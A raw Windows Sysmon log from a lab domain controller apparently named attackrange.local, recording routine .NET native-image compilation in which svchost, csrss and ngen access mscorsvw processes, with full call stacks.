13:21:53.305{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F401-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.289{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F401-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.289{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F401-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.258{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F301-000000009A01}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.258{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F301-000000009A01}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.258{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F301-000000009A01}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:53.180{08A6967A-4570-6000-F201-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\664-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-01-14 13:21:53.180 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.680{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4572-6000-0302-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.664{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4572-6000-0302-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.664{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4572-6000-0302-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4572-6000-0202-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.414{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4572-6000-0202-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.414{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4572-6000-0202-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.258{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4572-6000-0102-000000009A01}2704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.242{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4572-6000-0102-000000009A01}2704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.242{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4572-6000-0102-000000009A01}2704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.055{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4572-6000-0002-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.055{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4572-6000-0002-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:54.055{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4572-6000-0002-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.993{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0F02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.977{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0F02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.977{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0F02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.914{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0E02-000000009A01}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.899{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0E02-000000009A01}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.899{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0E02-000000009A01}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framewo